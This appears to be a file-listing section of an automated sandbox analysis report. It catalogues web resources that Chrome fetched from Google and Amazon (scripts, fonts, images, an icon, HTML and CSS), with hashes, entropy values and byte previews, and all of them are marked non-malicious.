                                                                                                                                                                          File Type:ASCII text, with very long lines (665)
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):276717
                                                                                                                                                                          Entropy (8bit):5.353438150363169
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:3C66F4A874169140AE54522A79932AB8
                                                                                                                                                                          SHA1:BAE14697244A517EC3626011DB3B7D5842776A1A
                                                                                                                                                                          SHA-256:5B153D0DE899A912C5D4E38C154D2F24D972413566B6C45BB0C26C4B79C46949
                                                                                                                                                                          SHA-512:8FDE61B2CD52D7BD59C745AE11CD0F3B4226C2260B6CF0BB1FF979C8666CCC0DE76AB452ADC40C74A41822C26394AB8085A8EF10947E874998F36BA82657E3A8
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:"https://m.media-amazon.com/images/I/11B2bsTfmvL._RC%7C11Y+5x+kkTL.js,51XFQXG4llL.js,11yKORv-GTL.js,11GgN1+C7hL.js,01+z+uIeJ-L.js,01VRMV3FBdL.js,21BJeD9yjcL.js,01meRT+S4PL.js,11aD5q6kNBL.js,11rRjDLdAVL.js,51LGf0aHP5L.js,11nAhXzgUmL.js,11UNP9ncXuL.js,113pYUOav3L.js,11uo7qXoO3L.js,01VhK3jZdbL.js,21eKR4hvwNL.js,01Q4S7ptbiL.js,51XuQjpKb8L.js,01JYHc2oIlL.js,31nfKXylf6L.js,01ktRCtOqKL.js,21xlsLy-PNL.js,11bEz2VIYrL.js,31o2NGTXThL.js,01rpauTep4L.js,315n+VmgJ3L.js,01tvglXfQOL.js,11jxZ9ouCoL.js,01fBsnBQx0L.js_.js?AUIClients/AmazonUI&88n9Ttiw"
                                                                                                                                                                          Preview:(function(a){var c=window.AmazonUIPageJS||window.P,d=c._namespace||c.attributeErrors,b=d?d("AmazonUIBaseJS@analytics","AmazonUI"):c;b.guardFatal?b.guardFatal(a)(b,window):b.execute(function(){a(b,window)})})(function(a,c,d){"use strict";a.register("a-analytics",function(){function b(b,f){var a=c&&c.ue&&c.ue.count;if(a&&b){var e="aui:"+b;1<arguments.length&&a(e,f);return a(e)}}var a=c&&c.ue&&c.ue.tag;return{increment:function(a,f){if(a){var c=b(a)||0;b(a,c+(f||1))}},count:b,logError:function(a,f,b){c.ueLogError&&.c.ueLogError({message:a},{logLevel:f,attribution:b})},tag:function(b){a&&b&&a("aui:"+b)}}});a.when("a-analytics").register("prv:a-cache-analytics",function(a){function b(a){var b=a.name.indexOf("AUIClients/AmazonUI");a=a.name[b+19];a=a===d||"\x26"===a||"#"===a;return-1!==b&&a}function e(b){a.tag(("script"===b.initiatorType?"js":"link"===b.initiatorType?"css":"unknown")+":"+(b.transferSize===d||b.decodedBodySize===d?"unknown":0===b.transferSize&&0<b.decodedBodySize?"cache":0<b.t
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 52280, version 1.0
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):52280
                                                                                                                                                                          Entropy (8bit):7.995413196679271
                                                                                                                                                                          Encrypted:true
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:F61F0D4D0F968D5BBA39A84C76277E1A
                                                                                                                                                                          SHA1:AA3693EA140ECA418B4B2A30F6A68F6F43B4BEB2
                                                                                                                                                                          SHA-256:57147F08949ABABE7DEEF611435AE418475A693E3823769A25C2A39B6EAD9CCC
                                                                                                                                                                          SHA-512:6C3BD90F709BCF9151C9ED9FFEA55C4F6883E7FDA2A4E26BF018C83FE1CFBE4F4AA0DB080D6D024070D53B2257472C399C8AC44EEFD38B9445640EFA85D5C487
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:https://fonts.gstatic.com/s/googlesans/v58/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2vgCI.woff2
                                                                                                                                                                          Preview:wOF2.......8.....................................^...$..4?HVAR..?MVAR9.`?STAT.*',..J/.......`..(..Z.0..R.6.$.... .....K..[..q..c..T.....>.P.j.`.w..#...%......N.".....$..3.0.6......... .L.rX/r[j.y.|*(.4.%#.....2.v.m..-..%.....;-.Y.{..&..O=#l@...k..7g..ZI...#.Z./+T..r7...M..3).Z%.x....s..sL..[A!.5*1w'/.8V..2Z..%.X.h.o.).]..9..Q`.$.....7..kZ.~O........d..g.n.d.Rw+&....Cz..uy#..fz,(.J....v.%..`..9.....h...?O..:...c%.....6s....xl..#...5..._......1.>.)"U.4 W....?%......6//!$...!.n9C@n...........!""^.....W..Z<.7.x.."UT.T....E.."R>.R..t.....H d..e_.K../.+8.Q.P.ZQ....;...U....]......._.e*......71.?.7.ORv.?...l...G|.P...|:...I.X..2.,.L........d.g.]}W#uW]QnuP-s.;.-Y.....].......C..j_.M0...y.......J..........NY..@A...,....-.F......'..w./j5g.vUS...U..0.&...y7.LP.....%.....Y......Y..D. e.A..G.?.$.......6...eaK.n5.m...N...,...+BCl..L> .E9~.b[.w.x....6<...}.e...%V....O.......*.?...a..#[eE.4..p..$...].....%......o._......N.._~..El....b..A.0.r8.....|..D.d..
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:GIF image data, version 89a, 500 x 200
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):161407
                                                                                                                                                                          Entropy (8bit):7.834905983819017
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:C8CCD7EE5BAA1D26F4E0A3BB40192A18
                                                                                                                                                                          SHA1:5889EE29D734DBF2F76DB98FF5ECDDC02BD00914
                                                                                                                                                                          SHA-256:0B62AE800780337943E96BB0933A975A8DE1C2814E29A8DE3BEDB9721B3393BB
                                                                                                                                                                          SHA-512:45C9309DCE10CD40E5E1A13256A04993078AFED0DC9B2032F02B5756DCF81758F1953074620CE43F999084D082F593467E7AE3FED53D5E375064601325771513
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:https://www.google.com/logos/doodles/2024/paris-games-archery-6753651837110536-law.gif
                                                                                                                                                                          Preview:GIF89a............Zi.............zRC.......1J.............eT.........t....jpu...JOT.2d..i...-+.....iX'toJsg0...!.....y..............7P............x.i Bu..!....1U....wK.{...YI.....i.N..k........v....u......J....w.h..*<.....QYc..u.c....x........S......w....SdI[..xc....ON6........J9..........r%3..Y..............NlZdk...$c.nW?.s...1M..5..w8F...jn.X..................y..t......G3-f.'..&Z..!..../F..*&........Wm..JV..+$....#@.!.....................i...........0..k.9e...........pz.......p.......=.....Bh............CzE..9`........ZR.C........T."#...)..L...../."5....k.......JB.......3l.............c.....).......)..! .......!..kF?..k......._.)@.=!k.Da.........._H.....{.:S===.s.......|.K...Z....!..NETSCAPE2.0.....!.......,...............H......*\....#J.H....3j.... C..I...(S.\...0c.I...8s.....@...J...H.*]...P.J.J......>h...W.[..m....Y.=..l.>...[.l..$.T.!......,.P.p]..... I..7.%U..AA..h.1y1..
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (13255)
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):203341
                                                                                                                                                                          Entropy (8bit):5.8825220652637435
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:673BC1F89D34BB9CEB253B9EB42C151F
                                                                                                                                                                          SHA1:E78A6760E3BA9DF2BE4F48C69473B844609F6FE8
                                                                                                                                                                          SHA-256:D14AD8908AA1C2C90F90EE012C71D83BB6BED0229CB2D2B4EB81446C402D6810
                                                                                                                                                                          SHA-512:36E089D2AE1BF840001AEBE8684777B3B8BDC96F9D0A6EDB0DBDACC11607190F960A1403E0CE1026D640BD4AF5E7B36CD31CD6A8695E1CBC501D8BA1E0D32821
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:https://www.google.com/
                                                                                                                                                                          Preview:<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta charset="UTF-8"><meta content="origin" name="referrer"><meta content="/images/branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image"><title>Google</title><script nonce="A-UHmE0k52sIufuvQVED_Q">window._hst=Date.now();performance&&performance.mark&&performance.mark("SearchHeadStart");</script><script nonce="A-UHmE0k52sIufuvQVED_Q">(function(){var _g={kEI:'HRXVZr75L_Kmi-gPltiDsAw',kEXPI:'31',kBL:'nJfO',kOPI:89978449};(function(){var a;((a=window.google)==null?0:a.stvsc)?google.kEI=_g.kEI:window.google=_g;}).call(this);})();(function(){google.sn='webhp';google.kHL='en';})();(function(){.var h=this||self;function l(){return window.google!==void 0&&window.google.kOPI!==void 0&&window.google.kOPI!==0?window.google.kOPI:null};var m,n=[];function p(a){for(var b;a&&(!a.getAttribute||!(b=a.getAttribute("eid")));)a=a.parentNode;return b||m}function q(a){for(var b=null;a&&(!a.getAttribute||!
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1943
                                                                                                                                                                          Entropy (8bit):7.708840863704724
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:D9060BE841CCBE9F731CC81DB21187E0
                                                                                                                                                                          SHA1:309E8A9A5311A1968FC7BB5010FB60C1A79B2FE5
                                                                                                                                                                          SHA-256:2D4D220FFF6C004F9BA48301752EE396F6D1FBC008790543B3A1A9DED64B65E4
                                                                                                                                                                          SHA-512:F03A606E537A0795D5E55BDD6D03A2172F810A926F7552919E993D384FC29EBAB248C382D4450E479F8B6E0C7004EBB25BE97D7638D522C13FA4C02C97E1D42F
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..........~......................................................!1AQ.aq."R....#....B.23Dr............................................!............?..............5UQQ.-EC.qD._#...:..u..jd....dq.SL..$..........o..oc...J.......Ai.[o....%..7.p.?.7. .R..."." ""." ""." /@^-a..\.1d..r.... ....x=....s....}....Q.4...G*.[...3.w<~...}Ed..RG....`....S+d.(m.8.wX.;.b.w({>N..91VQ.Rh.....H..n.n......@k*.3_.l/$0..Oc.=.f.Ui;.w8........-..c.....Fr..i..2.......:r.?zV7.,.%.DD.D@DD.D@DD......=.{...b..&z.....3.%..e}....{.b.L...........y...=...*.kul.I.Z.*.......C.!...V....&..s.%.&w.I.!.m41.6..4..|B......;.M=..6;.Pu...c.`/*-...O.a.....i; ....z..../.4.......^...DD.D@DD.D@E....'o.....(......q......(}.-.._E@7..*#nKH..p. .;.%m..j.K...G?...6&.{.../...<....zf..P.f..)...HfK.Y..nr.WC.A.c..@..@....^...lN,..D.li3<z..aFMq....."..
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):5430
                                                                                                                                                                          Entropy (8bit):3.6534652184263736
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:F3418A443E7D841097C714D69EC4BCB8
                                                                                                                                                                          SHA1:49263695F6B0CDD72F45CF1B775E660FDC36C606
                                                                                                                                                                          SHA-256:6DA5620880159634213E197FAFCA1DDE0272153BE3E4590818533FAB8D040770
                                                                                                                                                                          SHA-512:82D017C4B7EC8E0C46E8B75DA0CA6A52FD8BCE7FCF4E556CBDF16B49FC81BE9953FE7E25A05F63ECD41C7272E8BB0A9FD9AEDF0AC06CB6032330B096B3702563
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:............ .h...&... .... .........(....... ..... ............................................0...................................................................................................................................v.].X.:.X.:.r.Y........................................q.X.S.4.S.4.S.4.S.4.S.4.S.4...X....................0........q.W.S.4.X.:.................J...A...g.........................K.H.V.8..........................F..B.....................,.......................................B..............................................B..B..B..B..B...u..........................................B..B..B..B..B...{.................5.......k...........................................................7R..8F.................................................2........Vb..5C..;I..................R^.....................0................Xc..5C..5C..5C..5C..5C..5C..lv..........................................]i..<J..:G..Zf....................................................
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):2163
                                                                                                                                                                          Entropy (8bit):7.769343784093211
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:13A3C64385D169ADF97040BE924B5877
                                                                                                                                                                          SHA1:87CA222FB447DDAED82B7B2B9030801620A73D04
                                                                                                                                                                          SHA-256:80F147F5577DDDA7EAD1290A4FE645A2229B8FAAC61A513CDFE28805BDE5EA2A
                                                                                                                                                                          SHA-512:35A46013E03F57EA85522D94AB1809225CE09D4BC33E3F128770C3DCB1A01151F1E4D809C82315221E0EA7C32BAFEDF27E85575ADC71EBA4CF448E553CAF9594
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:https://images-eu.ssl-images-amazon.com/images/G/39/electronics/store/kamja/WebQC/2021/Laptops/Feb_AllLaptops_1x._SY116_CB659039411_.jpg
                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t....".................................................................1U...!2Sat.....ABQR...%Cbqr.."&34....................................................!.1b....AB.2.."Rqr..............?...D@...DD....D@...DD....D@....s..J<..e.(.W6.....Y.v....YG..j.,.R../m @7PS.5Y..{...kP.J.6..W.@...42<,Y..j..{...)Y....[..[]...Cl].5<n.k.J..B..<.p]|H.....~v..e....!.^Rp..b...).SST.....,h=.k...\l...}.f..L~P.y.R..D.zz)..e..=..N.Q.C...{ >.0..l."v...W...!..G.k..=.{W...e..=.._2RG.k0....7...4../u.^&....^.QlC...g..=..Qi#g..!c..p...}..s.z>~..[...)oL..*.8.S.A..};.d....K..>.x+._.>..-...*....U..=..Y..K.U=..nt."*E....A...M..>..n..8H/.3...._......C..y.U*)UW.i.v:=v.=...ha.|n..)......O.T.......72g..e.T.^/.~+.EP.+........k....{...=..?....2..(.$i...a..I.v....%.Wg...3.=....2.....W...X4q5l..2.zaO...+|yt....Q...@.s.....|....F..q..t
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):3425
                                                                                                                                                                          Entropy (8bit):7.778533927445506
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:E43C6D4C16460D0B8BB999C5A26AE91E
                                                                                                                                                                          SHA1:277078E1852D7BBC08C86D660BFDB1B5B266BDF9
                                                                                                                                                                          SHA-256:12214D46F95527289700038AA436B4A6F5BD9112B3EFE1DC7C2A5F047B78C099
                                                                                                                                                                          SHA-512:CEE7A534C0AF4F3F9880232360D071DAB493A48711DBB8A43179AAFDD1022847DCA8512D8D82CA142A8209E4152F74F89D0F51D0F66A4C87218347A45B95183D
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:......JFIF......................................................................................................................................................t...."..........5....................................................................1................/.K".....I..X.......8.xk../.h...{.'...7;.....@.....+...Gh..m.....Y^H..Xk...zn1.@....|.hh........[.o.......~....|~..l..a."$.0%".3.........R.F}9.......x.k..l...K.,..j.....<...+......b.B ..................-..............................0.!"#4A`$%23Q...............H.5...2?....6.qPQ.b...v....?oL..7P.V..m.\.&.j..+6. ..[......_.....y.......-.b..'..;.......8.x....H;EI....5]..>.3..>:._..d5j3h9q.D......l...d.nG.8...$^."{.-.z..O.2/:.R....^...E.#.l.c.&.s....j..9.X'..IGR<....).s:.+DA.".......!..-..46..L5,...Vbml..*..#H....A.s@V.&.S.5t..iP.G..W...M.;.j.....'~w...".Wf.D....T..`....L4..n..+.'..a..vdM.....=.<..L.....Q...F.........*g...f+x&Y....G.....`.o^SJ..v<......t.I.Z.....&x...j.3......:..O%d.y....a
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:ASCII text, with very long lines (596)
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):730026
                                                                                                                                                                          Entropy (8bit):5.578600540479651
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:61FA42941A224824402F359F60871C5F
                                                                                                                                                                          SHA1:271F3DA1C67FAABB99CBDE5D9CD2DDA5865A951C
                                                                                                                                                                          SHA-256:503A90B40BEDB4889C890316C07CEC378FABED209B8558F533C9FFAC61328A22
                                                                                                                                                                          SHA-512:099F7C97B943EF69BA89486F3CAE47229AC99BD91FDCDFD686531312BE2F2E04379C0FF6F4BF35E2D5E3E57613E8AFF9E9AE4DFF2DBABD7012F4C19211184175
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:"https://images-eu.ssl-images-amazon.com/images/I/411x8BHUrFL._RC%7C71xP0umV4JL.js,01gK5H1EnXL.js,01phmzCOwJL.js,01eOvPdxG7L.js,71XgoEkp5EL.js,41jBieyCvYL.js,01wXnKULArL.js,01+pnQJuQ0L.js,21S7jO9Y-sL.js,418r495M0ML.js,51H8vCDt+dL.js,31J-NEfNY0L.js,11lEMI5MhIL.js,31+UifI0MIL.js,71-pKfDl0GL.js,41aCLC6fiuL.js,01VYGE8lGhL.js_.js?AUIClients/NavDesktopUberAsset&HUTipDuy"
                                                                                                                                                                          Preview:(function(y){var f=window.AmazonUIPageJS||window.P,p=f._namespace||f.attributeErrors,d=p?p("NavSharedAssets",""):f;d.guardFatal?d.guardFatal(y)(d,window):d.execute(function(){y(d,window)})})(function(y,f,p){(function(d){if(!d.$Nav||d.$Nav._replay){document.createElement("header");var a=function(){this.data={}},c=function(a){c.manager.add(a)};a.arrayAdder=function(a){return function(){this.data[a]=(this.data[a]||[]).concat([].slice.call(arguments));return this}};a.prototype={build:function(a,b){this.data.name=.a;this.data.value=b;this.data.immediate=!1;this.data.process=!0;c.manager.add(this.data)},run:function(a,b){b&&(this.data.name=a);this.data.value=b||a;this.data.process=!0;c.manager.add(this.data)},publish:function(a,b){this.data.name=a;this.data.value=b;c.manager.publish(this.data)},declare:function(a,b){this.data.name=a;this.data.value=b;c.manager.add(this.data)},when:a.arrayAdder("when"),iff:a.arrayAdder("iff"),filter:a.arrayAdder("filter"),observe:a.arrayAdder("observe")};var
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:ASCII text, with very long lines (549)
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1031221
                                                                                                                                                                          Entropy (8bit):5.720264006781374
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:0650F5FE05A553FB50F0ABCEC55C72EE
                                                                                                                                                                          SHA1:6132C1C5B47C628D79A71E9B449C764F4D53FD42
                                                                                                                                                                          SHA-256:7A31831A10CA4DA8041F7A11E69E228E77BB4AFB54A786DD44E54B34313776B9
                                                                                                                                                                          SHA-512:985794F827DBEB34C1D7849B43BBF3EE8FD405BFF4E70B6A334641EC5E31EA86FB342B740D4DFCEEAE00327489DE1E9A78FD53DAE8E375E70D523D2FE1F24B51
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:this._hd=this._hd||{};(function(_){var window=this;.try{./*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2024 Google, Inc. SPDX-License-Identifier: MIT.*/./*. SPDX-License-Identifier: Apache-2.0.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var baa,caa,naa,Aaa,Caa,Iaa,Taa,$aa,iba,kba,mba,nba,rba,sba,wba,xba,Aba,zba,uba,Ra,Dba,Iba,Jba,Kba,Pba,Sba,Tba,Vba,Wba,Xba,Zba,$ba,eca,jca,kca,lca,pca,rca,tca,Bca,Eca,Fca,xca,Gca,yca,Hca,wca,Ica,vca,Jca,Lca,Sca,Uca,Vca,Zca,$ca,dda,gda,ada,fda,eda,cda,bda,hda,ida,jda,kda,nda,oda,pda,qda,rda,uda,vda,wda,zda,yda,Dda,Eda,Jda,Kda,Mda,Lda,Oda,Qda,Pda,Sda,Rda,Vda,Uda,Xda,$da,cea,eea,fea,kea,mea,nea,rea,tea,Eea,Fea,Hea,lea,pea,Kea,Oea,Xea,Yea,ifa,dfa,kfa,lfa,$ea,ofa,mfa,tfa,ufa,vfa,yfa,zfa,afa,xfa,Bfa,Dfa,.Hfa,Ifa,Pfa,Sfa,Ufa,cga,ega,gga,hga,qga,sga,vga,xga,yga,Aga,Cga,Gga,Hga,Jga,jha,kha,mha,sha,Iha,Gh
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):3251
                                                                                                                                                                          Entropy (8bit):5.434965835947514
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:EBB1FA2B87ABED3D7E7A57B6F4164586
                                                                                                                                                                          SHA1:434172051D34D35C7205BCA0A59A146D622855DD
                                                                                                                                                                          SHA-256:E43426DB8ACDB169400777C28A199C2D9B32DDAA7AE3444A8BA0FAA45B6189C7
                                                                                                                                                                          SHA-512:1863D50568252E88AB1148F24E6F34832B85CEC508896C707C4409C92BE87D2C84E75B1FDA0BEBDE5C0BFCE59D46C9163970E5E186F65830C99DFC841DF6A29A
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:"https://fonts.googleapis.com/css?family=Lato:300,400|Montserrat&subset=latin,latin-ext"
                                                                                                                                                                          Preview:/* latin-ext */.@font-face {. font-family: 'Lato';. font-style: normal;. font-weight: 300;. src: url(https://fonts.gstatic.com/s/lato/v24/S6u9w4BMUTPHh7USSwaPGR_p.woff2) format('woff2');. unicode-range: U+0100-02AF, U+0304, U+0308, U+0329, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./* latin */.@font-face {. font-family: 'Lato';. font-style: normal;. font-weight: 300;. src: url(https://fonts.gstatic.com/s/lato/v24/S6u9w4BMUTPHh7USSwiPGQ.woff2) format('woff2');. unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;.}./* latin-ext */.@font-face {. font-family: 'Lato';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/lato/v24/S6uyw4BMUTPHjxAwXjeu.woff2) format('woff2');. unicode-range: U+0100-02AF, U+0304, U+0308, U+0329, U+1E00-1E9F, U+1EF2-1EFF, U+2020,
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):3095
                                                                                                                                                                          Entropy (8bit):7.769203667509138
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:9EC6CC12F6B0FF0FB05D2B355EF68C35
                                                                                                                                                                          SHA1:29D6B7A4584DDBB7BBD687FFAAEF44568AA52F56
                                                                                                                                                                          SHA-256:C36677AFDFEB29C9EE213C148973DA50589D05FFBAB7749517F6ED250D7E9AE3
                                                                                                                                                                          SHA-512:5F34FA2F602789E866E3B366905D436C40700311524DE34D05FC6F840438885207E669DDF891DE233D04389736FE8FB0D67969CB6FB4162CE669B66314A79180
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:https://images-eu.ssl-images-amazon.com/images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-NDZjYTNkNGMt-w186._SY116_CB642007526_.jpg
                                                                                                                                                                          Preview:......JFIF......................................................................................................................................................t...."..........2.....................................................................N..$..............,1....s.B}i........u.U..z..P|..i..q^9r.M...4........MI.......x..f....^|.2w]2.[qm@d.....V.j+.#og...e..<...".T.O......>:.?<?..w..b....{...Af`[....>.....s.+.1@..".Nx........_%N..G.j.x:..xzH..O....Z...............-............................@..!0....# "'7P.............a.Q.....t.L.U....D..]\..8..F.L.>.....S&......#-'.M^N...N'>...t.[L7S:3Fo.5g`....Mn/b.--..w..r..h..3H.6..s.[.1....]"&...2s...8..XsK.0.^v.....o.o..F4....;.*..n.."..U.@y...Hr.B.......!..Z.o..NS..a#pG?..llwU.B'<....'L..Z..1r....e!V0$.c..lW8.G.m.n&.......7.!...0....J.?W..L%M.....G.U.=.z.W...HE.`.2O.....#..Q.t...W.A?..IQt...=.H.........'{...]]......a.Ol.J..&.....L....T...u.Jj..Z..I...P.#h9n*..5.....\b.....(..M7'.7rK.A./,(4......s.#.~.t
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 72x72, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):3776
                                                                                                                                                                          Entropy (8bit):7.872838935276297
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:DD1DB8A771EFE67340E42676BFFF9953
                                                                                                                                                                          SHA1:691BB2054729E96AE051D72A3FCDDA7511351027
                                                                                                                                                                          SHA-256:DC1EEBFCEC6F411A302FA464F6AC6800C48D9CB0728170A52DC7BE5F1230A8F4
                                                                                                                                                                          SHA-512:BCF021C46CA21B86617FD80BFD53CD2DE18BEC487551869C927FE1173F559DB29F6121B80D29A14A043FE232CD4C1D2391760C795EAF523D4B90543A6382BF6A
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:......JFIF.....H.H.....C......................'.....'/''''''////////888888BBBBBJJJJJJJJJJ...C....... .. M4+4MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM......t...."........................................@.........................!..1AQa"2q....#B.......3Rbr...$.CDS.................................&........................!1.A"Q2B................?..H..""...:..yJ...E[...........)...l19&...:..T.x..t;.%..\.B.u.|....k...F.Z..B*.....5.T...r....9K.g......)(^!.y3......4...|.N.4..B\u\...*...plS.......u..W..g.q8U..:....MSUaQ+0....P...q.%.P..f5SUUh..@.a..p9.5JLj....{....8.@./..j...._.x.m..^.....}W..u,""...." ....w.....v$.......&...w.4....`f 7>c.\...#.Yu.qJh...x......a.qq.I.;+..H.J(...\.|...\.0.....x..\|..w/gs..U.D.z..$9.....I...?...J......5n'....+I.............$u.6..>....M..fg].s...Z.._.....3{4.|d.....mp.P.DU........>{W.,.?..U.......2..@...M.......C3i.i.[.vR.ll.7..g..x.H.A.:....s.O.E;h...6.PBd.q.=.y../..q..S...H..@ .k..3.j..mL.n......0.r.G^........x......
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):3097
                                                                                                                                                                          Entropy (8bit):7.796732921016361
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:D6CDF967FF56E4FC4101417898604FB3
                                                                                                                                                                          SHA1:3C5502DAB48481B09937CB2FC2911D98375B9ACD
                                                                                                                                                                          SHA-256:AAA083549A0B0892E4E3521D3480FD10CAE51F41B7B995B7D36C78C799D97A0E
                                                                                                                                                                          SHA-512:0C0D5CC3815D8FF7BF93B4BF2BE42C8E5E3B0A2B0FEB1D73B909189382989C7F0EE762285AB232A29362CE34A07F299FAA5E46D6F6AB4B2852BC48404E888FAF
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
